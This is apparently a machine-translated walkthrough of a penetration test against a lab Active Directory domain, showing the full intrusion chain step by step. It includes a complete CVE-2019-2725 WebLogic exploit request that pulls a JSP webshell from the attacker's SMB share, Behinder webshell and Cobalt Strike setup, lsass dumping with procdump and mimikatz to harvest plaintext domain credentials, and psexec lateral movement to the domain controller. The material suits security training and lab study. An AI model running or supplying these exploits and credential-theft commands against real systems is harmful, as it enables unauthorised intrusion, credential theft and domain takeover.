Domain environment initialization
DC IP: 10.10.10.10 OS: Windows 2012(64) Application: AD field WEB IP1: 10.10.10.80 IP2: 192.168.111.80 OS: Windows 2008(64) Application: Weblogic 10.3.6 MSSQL 2008 PC IP1: 10.10.10.201 IP2: 192.168.111.201 OS: Windows 7(32) Application: Attack aircraft IP: 192.168.111.5 OS: Kali
nmap -p- -T5 192.168.111.80 -o web
-p - indicates to scan all ports;
-T5 specifies the sequence used in the scanning process. There are 6 levels (0-5) in total. The higher the level, the faster the scanning speed, but it is also easy to be detected and shielded by firewall or IDS. T4 is recommended when the network communication condition is good.
-o save scan results to web file
The common port is open. 1433 is mssql. 7001 is known as weblogic service because we opened it manually.
Consider weblogic service vulnerabilities and find WeblogicScan tool to scan.
python3 WeblogicScan.py -u 192.168.111.80 -p 7001
A loophole was found
CVE-2019-2725 vulnerability Description: This is a Weblogic deserialization Remote Code Execution Vulnerability. Wls9 included by default in some versions of Weblogic_ async_ The response package provides asynchronous communication services for WebLogic Server. Due to the flaw of the WAR package in deserializing the input information, an attacker can send a carefully constructed malicious HTTP request to obtain the permission of the target server and execute commands remotely without authorization.
Start smbserver shared file service
We need to put / root / behind / server / shell The JSP webshell Trojan horse program is uploaded to the weblogic Server. Then use the ice scorpion to connect to the shell JSP Trojan horse program.
impacket-smbserver share /root/desktop/Behinder/server &
POST /_async/AsyncResponseService HTTP/1.1 Host: 192.168.111.80:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 841 SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>cmd</string> </void> <void index="1"> <string>/c</string> </void> <void index="2"> <string>copy \\192.168.111.5\share\shell.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\1.jsp </string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header> <soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
202 status code: Accepted indicates that the server has received the request message but has not yet processed it. However, there is no guarantee for the processing of the request, that is, it is impossible to send an asynchronous request to the client through the HTTP protocol to inform the processing result of the request. This status code is designed to send the request to another process or server for processing, or in the case of batch processing of the request.
Problem: a shared file was found inaccessible
Upload shell using exploit tool
Upload ice scorpion's horse
Start the ice scorpion
java -jar Behinder_v3.0_Beta6_linux.jar &
Ice scorpion connection
URL: http://192.168.111.80:7001/_async/shell.jsp password: rebeyond
Start the cs server with the password 123456
./teamserver 192.168.111.5 123456 &
Next, create a listener
Select in Attacks
Select and save, and then use ice scorpion to upload this exe file
Next, run the program in the virtual terminal
Open the session and modify the command execution cycle to 2s
View the current user identity as admin account
Use procdump64+mimikatz to obtain the plaintext password of win user
procdump64.exe introduction: its main purpose is to monitor the CPU abnormal trend of the application, and generate crash dump file in case of this exception, so that the R & D personnel and administrators can determine the cause of the problem.
lsass. Exe Process Overview: lsass.exe Exe is a system process used for the security mechanism of Microsoft Windows system. It is used for local security and login policies. That is, LSASS After the EXE process runs, the user account and password information will be saved.
beacon> shell procdump64.exe -accepteula -ma lsass.exe lsass.dmp
-accepteula Parameter: Specifies whether to accept automatically Microsoft Software license terms. This setting is required for all unattended installations. -ma Parameters: generating full dump, That is, all memory of the process is included. default dump The format includes thread and handle information.
Decryption: the fact that the digital guard does not intercept here does not mean that mimikatz is free from killing. In the actual environment, if mimikatz is not free from killing, LSASS Drag the DMP file back locally and put it into the same system for decryption.
shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"> password.txt
Directly use the download command to download. After downloading, it will be saved to the downloads directory of the program directory.
Use CS for credential collection
Currently available domain user information:
Domain user name: de1ay\mssql Password: 1 qaz@WSX Domain user name: de1ay\administrator Password: 1 qaz@WSX #This is the DC domain administrator user and password Local user name: WEB\de1ay Password: 1 qaz@WSX This user is used by the system to log in to the system locally.
Get domain control
Check the network information and find the domain controller
beacon> shell ipconfig /all
DNS server 10.10.10.10 is also called domain control. View domain controllers
beacon> shell net group "domain controllers" /domain
Host name: DC，The complete host is: DC.de1ay.com Reconfirm that the host name is DC of IP Address: beacon> shell ping dc Or: beacon> shell ping DC
Successfully ping ed
Next, see domain administrators
shell net group "domain admins" /domain
Connect domain control server - rebound domain control shell
Return to the initial user account of the control target host
View current permissions:
Generate a new voucher through the DE1AY\administrator account information of the DC obtained earlier.
beacon> make_token DE1AY\administrator 1qaz@WSX
Create a new listener to realize transit, which is convenient for passing horizontally through the SMB Listener through the named pipe psexec.
Use this name after smb.
When the DC goes online, jump will use the previous credentials and smb listener to complete the process of logging in to the DC
beacon> jump psexec DC smb Or: jump psexec 10.10.10.10 smb #The target machine can be a DC host name or an IP address
Take domain control